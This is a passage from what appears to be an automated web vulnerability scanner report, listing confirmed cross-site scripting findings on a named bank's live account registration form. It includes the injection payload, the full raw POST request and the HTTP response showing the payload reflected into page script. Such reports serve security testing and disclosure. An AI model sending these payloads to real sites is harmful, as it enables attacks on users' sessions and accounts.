			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;2&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;200&quot;);
fFillFormField(document.mainForm[&quot;aData[servProviderAnswer]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0001A6)&lt;/script&gt;&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BservProviderAnswer%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0001A7)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 333
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=-1&amp;aData%5BTYPE%5D=2&amp;aData%5BaccountKind%5D=200&amp;aData%5BserviceProvider%5D=BBAC47&amp;aData%5BservProviderAnswer%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001A7)%3c%2fscript%3e&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:26:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
        this.sTip = sTip;
        this.hideTimeoutId = null;
        var oThis = this;

        this.show = function (event) {
            var oEvent = (event || window.event);
            if (oThis.hideTimeoutId) {
                window.clearTimeout(oThis.hideTimeoutId);
                return;
            } else if (oThis.oTipContainer.style.display == &quot;block&quot;) {
                return;
            }
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;hidden&apos;;
            }
            oThis.oTipContainer.style.top = oEvent.clientY - oThis.oTipContainer.offsetHeight - 2;
            oThis.oTipContainer.style.left = oEvent.clientX + 3;
            oThis.oTipContainer.style.display = &quot;block&quot;;
        }

        this.hide = function () {
            oThis.hideTimeoutId = null;
            oThis.oTipContainer.style.display = &quot;none&quot;;
            aSelects = document.getElementsByTagName(&apos;SELECT&apos;);
            for (i=0; i &lt; aSelects.length; i++)  {
                aSelects[i].style.visibility = &apos;&apos;;
            }
        }

        this.hideTimeouted = function () {
            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
